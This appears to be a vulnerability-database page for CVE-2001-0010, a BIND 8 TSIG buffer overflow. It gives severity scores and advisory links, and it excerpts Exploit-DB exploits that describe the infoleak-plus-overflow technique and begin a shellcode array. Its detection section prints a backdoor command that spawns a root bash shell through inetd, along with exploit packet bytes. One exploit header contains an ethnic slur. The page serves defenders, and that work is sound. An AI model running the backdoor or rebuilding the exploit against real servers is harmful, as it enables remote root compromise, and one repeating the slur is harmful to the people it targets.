CVE-2001-0010
published 2001-02-12CVE-2001-0010: Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
PriorityP354critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
31.62%
98.1th percentile
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| isc | bind | — | — |
| isc | bind | — | — |
| isc | bind | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command/bin/echo 'ingreslockstream tcp nowait root /bin/bash bash -i' > /tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf↗
bytes↗
ab cd 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61
bytes↗
00 fa ff (TSIG type 0xfa, class ANY 0xff in DNS additional record)
bytes↗
00 00 fa ff (TSIG AR terminator sequence in exploit packets)
- →Detect DNS UDP infoleak probe packets: short (~23 byte) UDP DNS packets with the specific byte sequence AB CD 09 80 sent to port 53, used by exploits to leak the named process stack pointer before the overflow. ↗
- →Detect DNS query packets with DNS ID 0xDEAD containing a TSIG additional record (type 0xFA) — second stage of the exploit delivering the overflow payload. ↗
- →Detect a TCP connection to port 53 immediately followed by UDP DNS packets to the same target — the exploit establishes a TCP shell-back channel on port 53 while sending the overflow via UDP. ↗
- →Detect DNS NAME fields in query records that contain x86 shellcode patterns (e.g., JMP/CALL sequences, int 0x80 syscall bytes 0xcd 0x80) embedded within label segments — shellcode is smuggled inside DNS NAME fields. ↗
- ·The xtract_offset() values (argevdisp1 = 0x080d7cd0, argevdisp2 from offset 0x264 of infoleak response) are hardcoded for a specific BIND compilation and will differ across builds. ↗
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v5g5-g755-gf4v: Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges
ghsa_unreviewed·2022-04-30
CVE-2001-0010 [HIGH] GHSA-v5g5-g755-gf4v: Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
Red Hat
security flaw
vendor_redhat·2001-01-29·CVSS 10.0
CVE-2001-0010 [CRITICAL] security flaw
security flaw
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.
No detection rules found.
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)
exploitdb·2001-03-02
CVE-2001-0010 ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)
---
/*
* This exploit has been fixed and extensive explanation and clarification
* added.
* Cleanup done by:
* Ian Goldberg
* Jonathan Wilkins
* NOTE: the default installation of RedHat 6.2 seems to not be affected
* due to the compiler options. If BIND is built from source then the
* bug is able to manifest itself.
*/
/*
* Original Comment:
* lame named 8.2.x remote exploit by
*
* Ix [[email protected]] (the master of jmpz),
* lucysoft [[email protected]] (the master of queries)
*
* this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html)
* linux only shellcode
* this is only for demo purposes, we are not responsable in any way for what you do with this code.
*
* flamez - canaris
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1)
exploitdb·2001-03-01
CVE-2001-0010 ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1)
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1)
---
/*
* tsig0wn.c
* Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau
* [email protected]
* The author is not and will not be held responsible for the action of
* other people using this code.
* provided for informational purposes only
* since a greetz section is de rigeur
* greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ......
* a special fuck to all pakis including those idiots from GForce, etc....
* but then pakistan is one big village comprising exclusively of prize idiots
* tabstop set at 3
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
/*
* This shellcode sux. cant ever get around to coding another one.
*/
char shellcode[] = {
0xeb,0x3b,0
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2)
exploitdb·2001-03-01
CVE-2001-0010 ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2)
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2)
---
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Slackware 4.0/RedHat 6.2 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleak" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned.
Exploit-DB
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3)
exploitdb·2001-03-01
CVE-2001-0010 ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3)
ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3)
---
/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/
/*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Solaris 2.7 x86 #*/
/* The code establishes a TCP connection with port 53 of a target system. */
/* It makes use of the "infoleek" bug (through UDP) to obtain the base */
/* value of the named process frame stack pointer, which is later used */
/* for constructing proper DNS tsig exploit packet. */
/* */
/* Upon successful exploitation the assembly routine gets executed. It */
/* walks the descriptor table of the exploited named process in a search */
/* for the socket descriptor of the previously established TCP connection. */
/* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */
/* is spawned. */
/* */
http://www.cert.org/advisories/CA-2001-02.htmlhttp://www.debian.org/security/2001/dsa-026http://www.nai.com/research/covert/advisories/047.asphttp://www.redhat.com/support/errata/RHSA-2001-007.htmlhttp://www.securityfocus.com/bid/2302http://www.cert.org/advisories/CA-2001-02.htmlhttp://www.debian.org/security/2001/dsa-026http://www.nai.com/research/covert/advisories/047.asphttp://www.redhat.com/support/errata/RHSA-2001-007.htmlhttp://www.securityfocus.com/bid/2302
2001-02-12
Published